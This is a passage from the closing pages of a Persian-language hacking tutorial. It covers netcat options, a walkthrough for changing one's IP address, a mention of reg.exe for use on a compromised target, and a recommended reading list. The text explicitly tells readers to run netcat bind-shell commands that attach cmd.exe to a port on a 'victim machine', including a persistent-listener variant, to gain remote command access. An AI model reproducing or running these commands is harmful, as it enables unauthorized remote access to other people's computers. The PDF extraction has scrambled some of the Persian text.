یﮏ ﮔﺰیﻨﻪ –vﺏﺎﻋﺚ ﻣﻴﺸﻮد ﺕﺎ ﺏﺮﻧﺎﻣﻪ NCدر ﺻﻮرت ﺏﺮوز هﺮﮔﻮﻧﻪ ﻣﺸﮑﻠﯽ اﻃﻼﻋﺎﺕﯽ را در ﻣﻮرد ﺁدرﺱﯽ ﮐﻪ ﻗﺼﺪ ﺏﺮﻗﺮاری ارﺕﺒﺎط ﺏﺎ ان را دارد در اﺧﺘﻴﺎر ﺏﮕﺬارد .هﻤﭽﻨﻴﻦ ﺏﻬﺮﻩ ﮔﻴﺮی از دو ﮔﺰیﻨﻪ –vﻣﺘﻮاﻟﯽ ﺏﺎﻋﺚ ﺧﻮاهﺪ ﺷﺪ ﺕﺎ NCﮐﺎرﺏﺮ ﺧﻮد را در ﺟﺮیﺎن ﻣﻴﺰان اﻃﻼﻋﺎت ارﺱﺎﻟﯽ یﺎ دریﺎﻓﺘﯽ ﻗﺮار دهﺪ. ایﻦ ﮔﺰیﻨﻪ ﻣﺪت زﻣﺎن را ﺏﺮ ﺡﺴﺐ ﺙﺎﻧﻴﻪ ﻣﺸﺨﺺ ﻣﻴﮑﻨﺪ ﮐﻪ ﺏﺮﻧﺎﻣﻪ NCﺏﺎیﺪ ﭘﻴﺶ از ﺻﺮﻓﻨﻈﺮ از اﺕﺼﺎل ،ﺏﺮای ﺏﺮﻗﺮاری ﺁن ﻣﻨﺘﻈﺮ ﺏﻤﺎﻧﺪ .ﮔﺰیﻨﻪ ﻣﺬﮐﻮر هﻢ ﭼﻨﻴﻦ ﻣﺪت زﻣﺎﻧﯽ را ﻣﺸﺨﺺ ﻣﻴﮑﻨﺪ ﮐﻪ ﺏﺮﻧﺎﻣﻪ NCﭘﺲ از ﻣﻮاﺟﻪ ﺏﺎ ﺷﺎﺧﺺ ) EOFﺷﺎﺧﺺ ﭘﺎیﺎن ﻓﺎیﻞ یﺎ ( End-Of-Fileﺡﻴﻦ دریﺎﻓﺖ اﻃﻼﻋﺎت از ورودی اﺱﺘﺎﻧﺪارد ،ﭘﻴﺶ از ﺏﺴﺘﻦ اﺕﺼﺎل ﺏﺎیﺪ ﻣﻨﺘﻈﺮ ﺏﻤﺎﻧﺪ .ایﻦ رﻓﺘﺎر در ﻣﻮاردی از اهﻤﻴﺖ ﺧﺎص ﺏﺮﺧﻮردار اﺱﺖ ﮐﻪ ﻗﺼﺪﻣﺎن ارﺱﺎل ﻓﺮﻣﺎن ﻣﻮرد ﻧﻈﺮ از ﻃﺮیﻖ NCﺏﻪ یﮏ ﺱﺮور راﻩ دور ﺏﻮدﻩ و اﻧﺘﻈﺎر دریﺎﻓﺖ ﺡﺠﻢ ﺏﺰرﮔﯽ از اﻃﻼﻋﺎت را داﺷﺘﻪ ﺏﺎﺷﻴﻢ ) ﻣﺎﻧﻨﺪ ارﺱﺎل یﮏ ﻓﺮﻣﺎن HTTPﺏﻪ وب ﺱﺮور ﺟﻬﺖ ﺏﺎرﮔﻴﺮی یﮏ ﻓﺎیﻞ ﺡﺠﻴﻢ ( در ﺻﻮرﺕﯽ ﮐﻪ ﻗﺼﺪﻣﺎن ﺕﻨﻬﺎ اﻃﻼع از ﭘﻮرت هﺎی ﺏﺎز ﺏﺎﺷﺪ ،ﺏﻪ اﺡﺘﻤﺎل ﻗﻮی ﺏﻬﺮﻩ ﮔﻴﺮی از اﺏﺰار nmap ﮐﻔﺎیﺖ ﻣﻴﮑﻨﺪ .اﻣﺎ ﮔﺰیﻨﻪ –zﺏﺮﻧﺎﻣﻪ NCرا وادار ﻣﯽ ﮐﻨﺪ ﺕﺎ ﺕﻨﻬﺎ اﻃﻼﻋﺎﺕﯽ را در ﺡﺪ ﮐﻔﺎیﺖ راﺟﻪ ﺏﻪ ﭘﻮرت هﺎیﯽ ﮐﻪ از ﻣﺠﻤﻮﻋﻪ ﮐﻪ ﺏﺮﻧﺎﻣﻪ هﺎی ﻣﺨﺘﻠﻒ از ﻃﺮیﻖ ﺁﻧﻬﺎ در ﺡﺎﻟﺖ ﮔﻮش ﺏﻪ زﻧﮓ ﺏﻪ ﺱﺮ ﻣﻴﺒﺮﻧﺪ ،در اﺧﺘﻴﺎر ﻗﺮار دهﺪ.
دیﮕﻪ اﺱﺘﻔﺎدﻩ و ﺷﻴﻮﻩ ﺕﺮﮐﻴﺐ ﺏﻨﺪی ﺏﺎ ﺧﻮدﺕﺎن ،ﻣﻦ ﮐﺎﻣﻞ ﺕﻮﺽﻴﺢ دادم ﭘﺲ ﺧﻮدﺕﺎن ﺏﺎ ﺕﻮﺟﻪ ﺏﻪ ﻧﻴﺎزﺕﺎن ﺕﺮﮐﻴﺐ هﺎی ﻣﺨﺘﻠﻔﯽ را ﺏﻪ وﺟﺪ ﺁوریﺪ ﻣﺜﻞ ایﻦ ﭼﻨﺪ ﺕﺮﮐﻴﺐ ﻣﺸﻬﻮر : C :\> nc.exe -l -p 4455 -e cmd.exe ایﻦ ﺕﺮﮐﻴﺐ ﻣﺸﻬﻮر را ﺏﺎیﺪ روی ﻣﺎﺷﻴﻦ ﻗﺮﺏﺎﻧﯽ اﺟﺮا ﮐﻨﻴﺪ ﺕﺎ روی ﭘﻮرت ۴۴۵۵ﻣﺎﺷﻴﻦ هﺪف ﺏﺮﻧﺎﻣﻪ CMDیﺎ هﻤﺎن ﺧﻂ ﻓﺮﻣﺎن اﺟﺮا ﺷﻮد و ﺷﻤﺎ ﺏﺎ یﮏ Telnetﺱﺎدﻩ ﺏﻪ ﭘﻮرت ﺷﻤﺎرﻩ ۴۴۵۵ﺏﻪ ان دﺱﺘﺮﺱﯽ ﭘﻴﺪا ﮐﻨﻴﺪ ) .ایﻦ یﮑﯽ ﻓﻘﻂ ﺏﺨﺎﻃﺮ رایﮕﺎن ﺏﻮدن ﻣﻘﺎﻟﻪ ﺏﻪ ﻏﺎیﺖ!! اﮔﺮ ﻗﺒﻞ از ﺱﻮیﭻ –eﺱﻮیﭻ –dرا اﺱﺘﻔﺎدﻩ ﮐﻨﻴﺪ اﮔﺮ ﭘﻨﺠﺮﻩ ﺧﻂ ﻓﺮﻣﺎن ،ﮐﻪ در ﺁن دﺱﺘﻮر ﺏﺎز ﺷﺪن ﭘﻮرت را ﺻﺎدر ﮐﺮدﻩ ایﺪ ﺏﺴﺘﻪ هﻢ ﺷﻮد ،ﺏﺎز ﭘﻮرت
آﻣﻮزش ﻫﮏ و ﻣﻌﺮﻓﯽ ﻧﺮم اﻓﺰار ﻫﺎی ﻣﺮﺑﻮﻃﻪ ﺗﻮﺳﻂ ﺧﻮدم !!
ﺻﻔﺤﻪ
٦٩
ﻣﻮرد ﻧﻈﺮ ﺏﺎز ﻣﻴﻤﺎﻧﺪ و ﺏﺮﻧﺎﻣﻪ ﭘﺸﺖ ﺁن ﮔﻮش ﺏﻪ زﻧﮓ ؛ اﮔﺮ ﺏﻪ ﺟﺎی ﮔﺰیﻨﻪ –lاز ﮔﺰیﻨﻪ –Lاﺱﺘﻔﺎدﻩ ﮐﻨﻴﺪ ﺏﻌﺪ اﺕﻤﺎم ﮐﺎر ﺷﻤﺎ ﺏﺎ ﺏﺮﻧﺎﻣﻪ NCدیﮕﺮ از ﭘﺸﺖ ﭘﻮرت ﺧﺎرج ﻧﻤﻴﺸﻮد و هﻤﻴﺸﻪ ﺕﺎ راﻩ اﻧﺪازی ﻣﺠﺪد ﺁن ﻣﺎﺷﻴﻦ ﭘﺸﺖ ﺁن ﭘﻮرت ﮔﻮش ﺏﻪ زﻧﮓ ﺏﺮﻧﺎﻣﻪ CMDرا ﻧﮕﻪ ﻣﻴﺪارد ( .ﭘﺲ ﺱﻌﯽ ﮐﻨﻴﺪ ﺡﺘﯽ اﮔﺮ ایﻦ ﺕﻮﺽﻴﺤﺎت را هﻢ ﻣﺘﻮﺟﻪ ﻧﺸﺪیﺪ !! از ﺷﮑﻞ ﻋﻤﻮﻣﯽ NCدر ایﻦ ﺏﺎرﻩ ﺏﻪ ﺻﻮرت زیﺮ اﺱﺘﻔﺎدﻩ ﮐﻨﻴﺪ: C :\> nc.exe –p 4455 –d –L –e cmd.exe ﺏﺠﺎی ﻋﺪد ۴۴۵۵هﻢ ﺕﻮﺻﻴﻪ ﻣﻴﮑﻨﻢ از ﭘﻮرت هﺎی ﺷﻤﺎرﻩ ﺏﺎﻻ اﺱﺘﻔﺎدﻩ ﮐﻨﻴﺪ و ﻧﻴﺰ ﻣﻴﺘﻮاﻧﻴﺪ ﺏﻪ ﺟﺎی ﺧﻂ ﻓﺮﻣﺎن هﺮ ﭼﻴﺰ دیﮕﺮی را اﺟﺮا ﮐﻨﻴﺪ !! ایﻦ یﮏ ﺏﺎر دیﮕﺮ ﺏﮕﻢ ایﻦ ﻓﺮﻣﺎن ﺏﺎﻻ را ﺏﺎیﺪ روی ﻣﺎﺷﻴﻦ ﻗﺮﺏﺎﻧﯽ اﺟﺮا ﮐﻨﻴﺪ ﻧﻪ روی ﻣﺎﺷﻴﻦ ﺧﻮدﺕﺎن . زﻧﮓ ﺕﻔﺮیﺢ: ﭼﮕﻮﻧﻪ IPﺧﻮد را ﻋﻮض ﮐﻨﻴﻢ؟ در ایﻦ ﻣﻘﺎﻟﻪ ﺁﻣﻮزش ﻣﯽ دیﻢ ﭼﻪ ﺟﻮری IPﺧﻮدﺕﻮن را ﺏﺎ یﻪ IPدیﮕﻪ از هﻤﻮن Rangeﻋﻮض ﮐﻨﻴﻦ .هﺮ ﻣﻮﻗﻊ ﮐﻪ ﺏﻪ ایﻨﺘﺮﻧﺖ وﺻﻞ ﻣﻲ ﺷﻮیﺪ ،ﭘﺮوﺕﮑﻞ DHCPﺏﻪ ﺷﻤﺎ یﮏ IPﺕﺨﺼﻴﺺ ﻣﻴﺪهﺪ .ﻋﻮض ﮐﺮدن ایﻦ IPﮐﺎر ﭼﻨﺪان ﺱﺨﺘﻲ ﻧﻴﺴﺖ و اﻟﺒﺘﻪ ﻣﻴﺘﻮﻧﻪ ﻣﻔﻴﺪ هﻢ ﺏﺎﺷﻪ ! ﻣﺜﻼ ﻣﻮﻗﻌﻲ ﮐﻪ ﺷﻤﺎ ﺕﺤﺖ ﺡﻤﻠﻪ DDoSهﺴﺘﻴﻦ !! یﺎ وﻗﺘﻲ ﮐﻪ ﻣﻴﺨﻮاهﻴﻦ ﺕﻤﺎﻣﻲ درﺧﻮاﺱﺘﻬﺎ ﺏﻪ یﻪ وب ﺱﺮور رو ﺏﻪ ﻃﺮف ﺧﻮدﺕﻮن Redirectﮐﻨﻴﻦ ) ایﻦ ﺏﻪ درد ﻣﺎ ﻣﻴﺨﻮرد ! ( یﺎ ﻓﺮﺽًﺎ وﻗﺘﻲ ﮐﻪ IPﺷﻤﺎ ﺏﺴﺘﻪ ﺷﺪﻩ و ﻣﻴﺨﻮایﻦ ﺏﻪ ﺟﺎي اون از یﻪ IPدیﮕﻪ در Rangeﺧﻮدﺕﻮن اﺱﺘﻔﺎدﻩ ﮐﻨﻴﻦ و یﺎ ...ﺏﻪ ﺕﻐﻴﻴﺮ دادن IPاﺡﺘﻴﺎج ﭘﻴﺪا ﻣﻴﮑﻨﻴﻦ ! اﻃﻼﻋﺎت ﻣﻮرد ﻧﻴﺎز : ﻗﺒﻞ از ایﻨﮑﻪ ﺷﻤﺎ ﺏﺘﻮاﻧﻴﺪ IPﺧﻮدﺕﻮن رو ﻋﻮض ﮐﻨﻴﻦ ،ﺏﺎیﺪ یﻪ ﺱﺮي اﻃﻼﻋﺎت ﺟﻤﻊ ﮐﻨﻴﻦ .ایﻦ اﻃﻼﻋﺎت ﻋﺒﺎرﺕﻨﺪ از :ﻣﺤﺪودﻩ IPﺷﻤﺎ ، Subnet Mask ،ﻣﺪﺧﻞ ) (Gatewayﭘﻴﺶ ﮔﺰیﺪﻩ ، ﺱﺮور DHCPو ﺱﺮورهﺎي . DNS ﻼ ﺱﺨﺖ ﻧﻴﺴﺖ !ﻓﺮض ﮐﻨﻴﺪ IPﺷﻤﺎ 24.193.110.255ﺏﺎﺷﻪ .ﺷﻤﺎ ﻣﻴﺘﻮﻧﻴﻦ ﺏﻪ ﻃﻮر ﻣﺸﺨﺺ از ﻣﺤﺪودﻩ زیﺮ ﺏﺮاي IPﺟﺪیﺪ -١ﺏﻪ دﺱﺖ اوردن ﻣﺤﺪودﻩ ) : ( IPﺏﺪﺱﺖ اوردن IP Rangeاﺻ ً ﺧﻮدﺕﻮن اﻧﺘﺨﺎب ﮐﻨﻴﻦ : ] < 24.193.110.255ﺁي ﭘﻲ ﺟﺪیﺪ[ < 24.193.110.1 -٢ﺏﻪ دﺱﺖ اوردن ،Subnet Maskﻣﺪﺧﻞ ،ﺱﺮور DHCPو : DNSﺏﻪ دﺱﺖ اردون ایﻨﻬﺎ هﻢ ﺱﺎدﻩ اﺱﺖ! یﻪ ﺧﻂ ﻓﺮﻣﺎن DOSﺏﺎز ﮐﻨﻴﻦ و ﺕﻮش ﺕﺎیﭗ ﮐﻨﻴﻦ: ipconfig /allﺷﻤﺎ ﺡﺎﻻ ﺏﺎیﺪ ﺏﺘﻮﻧﻴﻦ یﻪ ﭼﻴﺰي ﺷﺒﻴﻪ ﺏﻪ ایﻦ ﺏﺒﻴﻨﻴﺪ :
Host Name . . . . . . . . . . . . : My Computer Name Here Primary Dns Suffix . . . . . . . : Node Type . . . . . . . . . . . . : Unknown IP Routing Enabled. . . . . . . . : No WINS Proxy Enabled. . . . . . . . : No Ethernet adapter Local Area Connection: Connection-specific DNS Suffix . : xxxx.xx.x )Description . . . . . . . . . . . : NETGEAR FA310TX Fast Ethernet Adapter (NGRPCI Physical Address. . . . . . . . . : XX-XX-XX-XX-XX-XX Dhcp Enabled. . . . . . . . . . . : Yes Autoconfiguration Enabled . . . . : Yes IP Address. . . . . . . . . . . . : 24.xxx.xxx.xx Subnet Mask . . . . . . . . . . . : 255.255.240.0 Default Gateway . . . . . . . . . : 24.xxx.xxx.x DHCP Server . . . . . . . . . . . : 24.xx.xxx.xx DNS Servers . . . . . . . . . . . : 24.xx.xxx.xxx 24.xx.xxx.xx 24.xx.xxx.xxx Lease Obtained. . . . . . . . . . : Monday, January 20, 2003 4:44:08 PM Lease Expires . . . . . . . . . . : Tuesday, January 21, 2003 3:43:16 AM ﺧﻮب ! ایﻦ ﺕﻤﻮم اﻃﻼﻋﺎﺕﻲ ﺏﻮد ﮐﻪ ﻧﻴﺎز داﺷﺘﻴﻦ .ﺏﻬﺘﺮﻩ اون ﺧﻂ ﻓﺮﻣﺎن DOSرو ﺏﺎز ﻧﮕﻪ داریﻦ یﺎ ایﻨﮑﻪ اﻃﻼﻋﺎت ﺁن را ﮐﭙﻲ ﮐﻨﻴﻦ ).ﺏﺮاي ﮐﭙﻲ ﮐﺮدن ،ﻣﺘﻦ رو اﻧﺘﺨﺎب ﮐﻨﻴﻦ و یﮑﺒﺎر روش ﮐﻠﻴﮏ ﮐﻨﻴﻦ( -٣ﻋﻮض ﮐﺮدن IP :ﺏﺮاي ﻋﻮض ﮐﺮدن IPﺧﻮدﺕﻮن ،اول ﺏﺎیﺪ یﮏ IPاﻧﺘﺨﺎب ﮐﻨﻴﻦ ! ) یﺎدﺕﻮن ﻧﺮﻩ ﮐﻪ ﺕﻮ ﻣﺤﺪودﻩ ﺏﺎﺷﻪ( ﺏﻪ ﻧﻈﺮ ﻣﻦ ﺏﻬﺘﺮﻩ اول ﻣﻄﻤﺌﻦ ﺏﺸﻴﻦ ﮐﻪ ایﻦ IPﺟﺪیﺪ ﻣُﺮدﻩ( ! ایﻦ IP را ) ﮐﻪ اﻧﺘﺨﺎب ﮐﺮدی ( ﭘﻴﻨﮓ ﮐﻨﻴﻦ و اﮔﻪ Time Outداد ﻣﻄﻤﺌﻦ ﺏﺎﺷﻴﻦ ﮐﻪ ﻣﻴﺸﻪ ازش اﺱﺘﻔﺎدﻩ ﮐﺮد .ﺡﺎﻻ در Control Panelﺏﺮیﺪ ﺏﻪ Network Connectionsو روي Connection ﻓﻌﺎل داﺏﻞ ﮐﻠﻴﮏ ﮐﻨﻴﻦ .دﮐﻤﻪ Propertiesرا ﺏﺰﻧﻴﻦ و ﺏﺮیﺪ ﺏﻪ ﺏﺮﮔﻪ Networking.ﺡﺎﻻ ) (Internet Protocol TCP/IPرا اﻧﺘﺨﺎب ﮐﻨﻴﻦ و دﮐﻤﻪ Propertiesرا ﺏﺰﻧﻴﺪ .در ﭘﻨﺠﺮﻩ ﺟﺪیﺪي ﮐﻪ ﺏﺎز ﺷﺪﻩ ،ﻗﺴﻤﺘﻬﺎي Use the following IP addressو Use the following DNS server addressesرا ﺏﺎ ﺕﻮﺟﻪ ﺏﻪ اﻃﻼﻋﺎﺕﻲ ﮐﻪ در ﻗﺴﻤﺖ ٢ﺏﻪ دﺱﺖ اوردیﻦ ﭘﺮ ﮐﻨﻴﺪ . در ﻗﺴﻤﺖ اول IP ،اي رو ﮐﻪ اﻧﺘﺨﺎب ﮐﺮدیﺪ ) IPﺟﺪیﺪ ( و در ﻗﺴﻤﺖ دوم ،ﺁدرس DNS Serverرا وارد ﮐﻨﻴﻦ .ﺡﺎﻻ ﺕﻐﻴﻴﺮات رو ﺙﺒﺖ و ﺕﺄیﻴﺪ ﮐﻨﻴﻦ .ﻓﻘﻂ یﻪ ﺕﺴﺖ ﮐﻮﭼﻴﮏ ﻣﻮﻧﺪﻩ ! در ﻣﺮورﮔﺮ ﺧﻮدﺕﻮن ،ﺁدرس یﻪ ﺱﺎیﺖ را وارد ﮐﻨﻴﺪ .اﮔﻪ ﺻﻔﺤﻪ ﺱﺎیﺖ اوﻣﺪ ،ﺏﺪوﻧﻴﻦ ﮐﻪ ﺏﺎ IPﺟﺪیﺪ داریﻦ ﮐﺎر ﻣﻴﮑﻨﻴﺪ .ﺏﺮاي ایﻨﮑﻪ ﻣﻄﻤﺌﻦ ﺏﺸﻴﻦ ﮐﻪ ﺕﻐﻴﻴﺮات اﻋﻤﺎل ﺷﺪن ،دوﺏﺎرﻩ در ﺧﻂ ﻓﺮﻣﺎن DOSﺕﺎیﭗ ﮐﻨﻴﻦ ip config /allاﮔﻪ ﭘﺲ از اﺟﺮاي ایﻦ دﺱﺘﻮرIP ،و DNSﺟﺪیﺪ رو دیﺪیﺪ ،ﺏﺪوﻧﻴﻦ ﮐﻪ درﺱﺖ ﻋﻤﻞ ﮐﺮدیﺪ
آﻣﻮزش ﻫﮏ و ﻣﻌﺮﻓﯽ ﻧﺮم اﻓﺰار ﻫﺎی ﻣﺮﺑﻮﻃﻪ ﺗﻮﺳﻂ ﺧﻮدم !!
ﺻﻔﺤﻪ
٧٠
ﺿﻤﻴﻤﻪ هﻔﺘﻢ و اﻟﺒﺘﻪ ﺁﺧﺮﻳﻦ ﺿﻤﻴﻤﻪ ؛ ﻣﻌﺮﻓﯽ ﺑﺮﻧﺎﻣﻪ : REG.exe ﺧﻮب ﺷﺎیﺪ ﺧﻴﻠﯽ ﻣﻮاﻗﻊ ﺷﻤﺎ ﺏﻪ ﺱﻴﺴﺘﻢ هﺪف دﺱﺖ ﭘﻴﺪا ﮐﻨﻴﺪ ﺕﺤﺖ یﮏ ﮐﺎرﺏﺮ ﻣﺤﺪود و ﺷﻤﺎ داﻧﺶ اﺱﺘﻔﺎدﻩ از رﺟﻴﺴﺘﺮی را دارا هﺴﺘﻴﺪ وﻟﯽ اﺏﺰار ایﻦ ﮐﺎر را ﻧﺪاریﺪ در ﺏﻴﺸﺘﺮ ﻣﻮاﻗﻊ ویﺮایﺶ ﮔﺮ ﮔﺮاﻓﻴﮑﯽ رﺟﻴﺴﺘﺮی ﻧﻴﺰ در دﺱﺘﺮس ﻧﻴﺴﺖ و ﮐﺎر ﺁدم ﺧﻴﻠﯽ ﻣﺸﮑﻞ ﻣﻴﺸﻮد ﺡﺎل ﺷﻤﺎ اﮔﺮ اﻃﻼﻋﺎﺕﯽ در ﺏﺎرﻩ اﺏﺰار reg.exeداﺷﺘﻪ ﺏﺎﺷﻴﺪ ﺕﻤﺎم ﻣﺸﮑﻼت ﺷﻤﺎ ﺡﻞ ﻣﻴﺸﻮد . ﮐﺎر ﺏﺎ ﺁن ﺱﺎدﻩ اﺱﺖ ﻗﺼﺪ ﺕﻮﺽﻴﺢ دادن ﺁن را ﻧﺪارم ﻣﻴﺘﻮاﻧﻴﺪ ﺕﻮﺽﻴﺤﺎت ﮐﺎﻣﻞ ان را در ١۴ﮐﺘﺎﺏﯽ ﮐﻪ ﻣﻌﺮﻓﯽ ﮐﺮدﻩ ام در ﭘﺎیﻴﻦ ،ﭘﻴﺪا ﮐﻨﻴﺪ. اﺧﺘﺘﺎﻣﻴﻪ : ﺧﻮب دیﮕﺮ واﻗﻌًﺎ ﺧﺴﺘﻪ ﺷﺪﻩ ام از ﺏﺲ ﮐﻪ ﺕﺎیﭗ ﮐﺮدﻩ ام ﺷﺐ ﭘﻴﺶ داﺷﺘﻢ ﺱﺎیﺖ هﺎی اﻣﻨﻴﺖ را ﻣﯽ ﮔﺸﺘﻢ ﮐﻪ دیﺪم ﺱﺎیﺖ ﺁﺷﻴﺎﻧﻪ ﻣﺒﺎﻟﻎ هﻨﮕﻔﺘﯽ ﻣﻴﮕﻴﺮد و ﻣﻄﺎﻟﺒﯽ در هﻤﻴﻦ ﺱﻄﺢ و اﻟﺒﺘﻪ ﭘﺎیﻴﻦ ﺕﺮ!! را ﺁﻣﻮزش ﻣﯽ دهﺪ و اﻟﺒﺘﻪ ﻣﺘﺪهﺎی ﺏﺮای هﮏ ﻓﻘﻂ در ﺷﺮایﻂ ﺧﺎص و ....ﻣﻦ ﮔﻔﺘﻢ ای ﺏﺎﺏﺎ... ﻣﻦ ﺱﻌﯽ ﮐﺮدم در ایﻦ ﻣﻘﺎﻟﻪ ﺁﻣﻮزش ﺱﻴﺴﺘﻤﺎﺕﻴﮏ ﺡﻤﻠﻪ را ﺏﻪ ﺷﻤﺎ دوﺱﺘﺎن ﺁﻣﻮزش ﺏﺪهﻢ .در ایﻦ ﺷﻴﻮﻩ ،ﺷﻤﺎ ﻣﺜﻞ یﮏ اﻧﺴﺎن ﻋﻘﺪﻩ ای ﮐﻪ یﮏ )ﻓﻘﻂ یﮏ( ﻣﺘﺪ را ﺏﻠﺪ اﺱﺖ و ﻓﻘﻂ دﻧﺒﺎل ﻣﺎﺷﻴﻦ هﺎی ﺧﺎﺻﯽ ﻣﻴﮕﺮدد ﮐﻪ ﺏﻪ وﺱﻴﻠﻪ ﺁن ﻣﺘﺪ ﺁﺱﻴﺐ ﭘﺬیﺮ هﺴﺘﻨﺪ ؛ ﻧﻴﺴﺘﻴﺪ ﺏﻠﮑﻪ ﺷﻤﺎ ﺏﺎ اﻧﺘﺨﺎب یﮏ هﺪف ﺧﺎص و اﻟﺒﺘﻪ ﺏﺎیﺪ ﺏﺮای ﺷﻤﺎ هﻢ ﺻﺮف هﻢ داﺷﺘﻪ ﺏﺎﺷﺪ ﺷﺮوع ﺏﻪ ﺡﻤﻠﻪ ﺏﻪ ﺁن ﻣﻴﮑﻨﻴﺪ ﺕﺎ ﺏﻪ هﺪف ﺧﻮد ﺏﺮﺱﻴﺪ .ﮐﺎر ﺏﺴﻴﺎر ﺁﺱﺎن اﺱﺖ ،و ﻧﻴﺎزی ﺏﻪ داﺷﺘﻦ اﻃﻼﻋﺎت ﺁﻧﭽﻨﺎﻧﯽ ﻧﻴﺰ در %٩٠ﻣﻮاﻗﻊ ﻧﺪارد ﻓﻘﻂ ﺏﺎیﺪ ﺡﻮﺻﻠﻪ داﺷﺘﻪ ﺏﺎﺷﺪ هﻤﻴﻦ ﺏﺲ ،ﺏﺎور ﮐﻨﻴﺪ ایﻦ ﻣﻄﻠﺐ ﺧﻴﻠﯽ راﺡﺖ اﺱﺖ اﻋﺘﻤﺎد ﺏﻪ ﻧﻔﺲ داﺷﺘﻪ ﺏﺎﺷﺪ و ﻣﻄﺎﻟﻌﻪ ﮐﻨﻴﺪ )ﻣﻦ واﻗﻌًﺎ ﺕﺎ ﺏﻪ ﺡﺎل هﺮ ﭼﻪ یﺎد ﮔﺮﻓﺖ ام از ﮐﺘﺎب ﺏﻮدﻩ در ﺏﻴﺶ از %٧٠از ﻣﻮاﻗﻊ( ،دیﮕﻪ هﻤﻴﻦ ﭼﻨﺪ ﺕﺎ ﮐﺘﺎب ﭘﺎیﻴﻦ ﻣﻌﺮﻓﯽ ﻣﻴﮑﻨﻢ اﮔﺮ ﺡﻮﺻﻠﻪ داریﺪ E-BOOKﺁن را ﭘﻴﺪا ﮐﻨﻴﺪ ﺏﺨﻮاﻧﻴﺪ ﺧﻴﻠﯽ ﺏﻪ ﺷﻤﺎ ﮐﻤﮏ ﻣﻴﮑﻨﺪ در ایﻦ راﻩ. -١ﮐﺘﺎب Hacking Exposedﮐﻪ ﻓﮑﺮ ﮐﻨﻢ از ﺱﺎیﺖ ﮐﺮوز ﺏﺘﻮاﻧﻴﺪ ﭘﻴﺪا ﮐﻨﻴﺪ ) .ﺕﻮﺻﻴﻪ ﻣﻴﺸﻮد ( -٢ﮐﺘﺎب Hacking Linux Exposedﮐﻪ ﺁن هﻢ از ﺱﺎیﺖ ﮐﺮوز ﻗﺎﺏﻞ ﺏﺎرﮔﻴﺮی اﺱﺖ. -٣ﮐﺘﺎب Security-Warriorﮐﻪ ایﻦ ﺷﮑﻠﯽ
-۴ﮐﺘﺎب Anti-Hacker toll kitﮐﻪ ﺏﻴﺶ از %۴۵ﻣﻄﺎﻟﺐ ایﻦ ﻣﻘﺎﻟﻪ از ﺁن اﺱﺖ ) .ﺕﻮﺻﻴﻪ ﻣﻴﺸﻮد( -۵ﮐﺘﺎب Computer Crime Incident Response: Investigatingﮐﻪ ﺧﻮب اﺱﺖ ) .ﺕﻮﺻﻴﻪ ﻣﻴﺸﻮد( -۶ﮐﺘﺎب Hack Counterﮐﻪ ﭼﻨﺪیﻦ ﺕﺮﺟﻤﻪ از ان ﻧﻴﺰ ﻣﻮﺟﺪ ﻣﻴﺒﺎﺷﺪ. -٧ﮐﺘﺎب Kevin Mitnick Art Of Deceptionﮐﻪ در ﺏﺎرﻩ هﻨﺮ ﻣﺦ زﻧﯽ . -٨ﮐﺘﺎب Security+ﮐﻪ از ﻣﺎیﮑﺮوﺱﺎﻓﺖ . -٩ﮐﺘﺎب ). Google Hackدر ﺻﻮرت ﺏﻴﮑﺎری ﺏﺪ ﻧﻴﺴﺖ!!( -١٠ﮐﺘﺎب Hack Proofing Your Networkﮐﻪ ایﻦ هﻢ ﻣﺜﻞ ﺏﺎﻻی اﺱﺖ یﺎ ﺷﺎیﺪ یﮏ درﺟﻪ ﺏﺎﻻﺕﺮ !! -١١ﮐﺘﺎب Microsoft Windows XP registry guideهﻢ ﺏﺪ ﻧﻴﺴﺖ. -١٢و .... ** داﺷﺘﻦ ﮐﺘﺎب ﻓﺮهﻨﮓ ﻟﻐﺖ ﻣﺎیﮑﺮوﺱﺎﻓﺖ ﺏﺎ ﻋﻨﻮان Microsoft Computer Dictionaryهﻢ در ﻣﻄﺎﻟﻌﻪ از ﺽﺮوریﺎت اﺱﺖ ﮐﻪ ایﻦ ﺷﮑﻠﯽ:
*** ﺏﻪ ﭘﺎیﺎن ﻣﻘﺎﻟﻪ رﺱﻴﺪیﻢ اﻣﻴﺪوار هﺴﺘﻢ ایﻦ ﻣﻘﺎﻟﻪ ﻣﻔﻴﺪ واﻗﻊ ﺏﺎﺷﺪ ﺏﺮای ﺷﻤﺎ دﺱﺘﺎن ؛ ﺏﻪ اﻣﻴﺪ ﻣﻮﻓﻘﻴﺖ ﺏﺮای هﻤﻪ ،اﻟﺒﺘﻪ در هﺮ ﮐﺎری ﮐﻪ هﺴﺘﻨﺪ و ﻧﻴﺰ در هﺮ ﻣﻘﻄﻌﯽ ﮐﻪ هﺴﺘﻨﺪ .
آﻣﻮزش ﻫﮏ و ﻣﻌﺮﻓﯽ ﻧﺮم اﻓﺰار ﻫﺎی ﻣﺮﺑﻮﻃﻪ ﺗﻮﺳﻂ ﺧﻮدم !! دوﺱﺘﺎر ﺕﻤﺎﻣﯽ دوﺱﺘﺎن . Zxo003 یﺎ ﺏﺎ ﻧﺎم ﻣﺴﺘﻌﺎر " ﺁﻗﺎی ﻣﻦ ". ﺏﺎ ﺕﺸﮑﺮ از هﻢ ﮐﺎری ﺧﻮدم " ﺧﻮژت هﮑﺮ ".
ﺻﻔﺤﻪ
٧١